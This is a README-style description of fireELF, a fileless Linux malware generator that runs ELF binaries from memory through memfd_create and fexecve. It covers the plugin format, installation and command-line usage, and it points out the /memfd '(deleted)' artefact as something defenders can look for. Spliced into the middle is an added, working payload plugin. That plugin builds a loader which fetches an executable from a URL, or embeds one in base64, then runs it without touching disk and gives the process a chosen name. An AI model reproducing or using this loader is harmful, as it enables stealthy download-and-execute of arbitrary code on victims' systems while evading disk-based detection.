fireELF is an open-source, cross-platform fileless Linux malware framework that lets users easily create and manage payloads.
By default it ships with 'memfd_create', a payload that runs Linux ELF executables entirely from memory, without the binary ever being written to disk (the underlying memfd_create(2) system call has been available since Linux 3.17).
Features
Included payload memfd_create
The only included payload, 'memfd_create', is based on the research of Stuart. It creates an anonymous in-memory file descriptor with memfd_create(2), writes the ELF image into it and then uses fexecve(3) to execute the binary directly from that descriptor.
Because the executable lives only in memory, nothing is left on disk, so once the Linux system is restarted the payload is nowhere to be found. While it is running, however, the process is still visible to the kernel: /proc/<pid>/exe resolves to a '/memfd:<name> (deleted)' link instead of a real path, and that link is the artefact a defender should look for.
Creating a Payload
By default fireELF comes with 'memfd_create', but users can develop their own payloads.
Payloads are stored in payloads/ by default. To create a valid payload, the module only needs to include a dictionary named 'desc' with the keys 'name', 'description', 'archs' and 'python_vers'. An example desc dictionary is below:
desc = {"name" : "test payload", "description" : "new memory injection or fileless elf payload", "archs" : "all", "python_vers" : ">2.5"}
In addition to the 'desc' dictionary, the plugin engine's entry point requires a main function, which is automatically passed two parameters: a boolean that is true when the second parameter is a URL, and the data itself (either that URL or the payload). An example of a simple entry point is below:
def main(is_url, url_or_payload):
return
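A payload module that follows the plugin contract just described (a `desc` dictionary plus `main(is_url, url_or_payload)`), written here as an added example rather than taken from fireELF's own payloads/ directory. The page does not say what the engine expects `main` to return, so this example assumes it returns the generated loader source as a string; the payload name, the base64-embedding approach and the `argv0` keyword are this example's own choices.

```python
"""Added example (not fireELF's own code): a payload plugin that implements
the desc + main(is_url, url_or_payload) contract and generates a fileless
loader. Assumption: main() returns the loader source as a string."""
import base64

desc = {
    "name": "memfd_b64",
    "description": "fileless ELF loader via memfd_create/fexecve; fetches a URL or embeds the binary",
    "archs": "all",
    "python_vers": ">=3.8",   # os.memfd_create() first appeared in Python 3.8
}

# Loader template: obtain the ELF bytes, put them in an anonymous memfd and
# fexecve() the descriptor. {fetch} is filled with one of the stanzas below.
_LOADER = """\
import os
{fetch}
fd = os.memfd_create("", os.MFD_CLOEXEC)
os.write(fd, data)
os.fexecve(fd, [{argv0!r}], dict(os.environ))
"""


def _fetch_stanza(is_url, url_or_payload):
    """Build the lines that define `data` inside the generated loader."""
    if is_url:
        # Engine handed us a URL: the loader downloads the ELF at run time.
        return "import urllib.request\ndata = urllib.request.urlopen(%r).read()" % url_or_payload
    # Engine handed us the raw executable: embed it as base64 so the loader
    # is a single self-contained source file.
    encoded = base64.b64encode(url_or_payload).decode("ascii")
    return "import base64\ndata = base64.b64decode(%r)" % encoded


def main(is_url, url_or_payload, argv0="memfd_payload"):
    """fireELF entry point. argv0 is what the in-memory process shows as its
    name in `ps`; the default is this example's own choice."""
    return _LOADER.format(fetch=_fetch_stanza(is_url, url_or_payload), argv0=argv0)


if __name__ == "__main__":
    # Constructed sample input: just the ELF magic, enough to show the embedding.
    print(main(False, b"\x7fELF"))
    print(main(True, "http://example.invalid/loader"))
```

The generated source is only a string at this point; it is the same memfd_create/fexecve flow the built-in payload performs, and running it is left to whatever the engine writes out with `-w` or publishes via the paste-site option.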
If you have a method, feel free to submit a payload!
Installation
Install the dependencies by running:
pip3 install -U -r dep.txt
fireELF is developed in Python 3.x.x
Usage
usage: main.py [-h] [-s] [-p PAYLOAD_NAME] [-w PAYLOAD_FILENAME]
(-u PAYLOAD_URL | -e EXECUTABLE_PATH)
fireELF, Linux Fileless Malware Generator
optional arguments:
-h, --help show this help message and exit
-s Supress Banner
-p PAYLOAD_NAME Name of Payload to Use
-w PAYLOAD_FILENAME Name of File to Write Payload to (Highly Recommended if
You're not Using the Paste Site Option)
-u PAYLOAD_URL Url of Payload to be Executed
-e EXECUTABLE_PATH Location of Executable